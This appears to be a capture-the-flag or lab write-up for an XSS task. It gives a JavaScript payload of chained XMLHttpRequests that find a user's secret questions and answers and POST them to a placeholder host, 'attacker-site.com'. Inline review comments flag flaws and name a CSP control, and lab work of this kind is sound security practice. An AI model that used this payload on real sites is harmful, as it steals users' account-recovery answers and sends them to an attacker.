Task 21
Objectives:
- Find John's Secret Questions+Answers using an XSS vulnerability on this page
- Display the Questions+Answers in the div with id "result"
- Send the Questions+Answers to your Attack Server
- No Hardcoded values can be used - everything has to be figured out dynamically
When you look at the API documentation, you will see that it is in XML; as per the 4th objective, everything must be derived dynamically.
So the regexes to use are /<endpoint>(.+?)<\/endpoint>/
, /<uid-param-value>(.+?)<\/uid-param-value>/
and /<token-param-value>(.+?)<\/token-param-value>/
// Lab payload for Task 21: three chained XMLHttpRequests. Request 1 fetches the
// API documentation linked from the first <a> on the page, request 2 calls the
// endpoint named in that document (same origin), and request 3 posts the
// resulting body to a third-party origin. Review notes are inline below.
let xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
// Runs on every state change; only the completed (4), successful (200) case is used.
if (this.readyState == 4 && this.status == 200) {
// The XML body is scraped with non-greedy regexes instead of being parsed.
// RegExp.exec() returns null when a tag is absent, so the [1] index would throw
// a TypeError rather than fail gracefully.
let ep = /<endpoint>(.+?)<\/endpoint>/.exec(this.responseText)[1];
let uid = /<uid-param-value>(.+?)<\/uid-param-value>/.exec(this.responseText)[1];
let tok = /<token-param-value>(.+?)<\/token-param-value>/.exec(this.responseText)[1];
let xhr1 = new XMLHttpRequest();
xhr1.onreadystatechange = function () {
if (this.readyState == 4 && this.status == 200) {
// NOTE(review): objective 2 (showing the response in the div with id "result")
// is not implemented by this snippet; only the exfiltration step is.
let xhr2 = new XMLHttpRequest();
// "attacker-site.com" is a placeholder destination. A Content-Security-Policy with
// connect-src restricted to 'self' would block this cross-origin POST, which is the
// control to verify when assessing this page.
xhr2.open("POST", "http://attacker-site.com", true);
xhr2.setRequestHeader("Content-Type", "application/json");
xhr2.send(this.responseText);
}
};
// uid and tok are interpolated into the query string without encodeURIComponent,
// and the token is carried in the URL rather than a header.
xhr1.open("GET", location.origin + ep + "?uid=" + uid + "&token=" + tok, true);
xhr1.send();
}
};
// Entry point: the documentation URL is taken from the first <a> on the page,
// so nothing about the API location is hardcoded (objective 4).
xhr.open("GET", document.querySelector("a").href, true);
xhr.send();
For POC, Click Here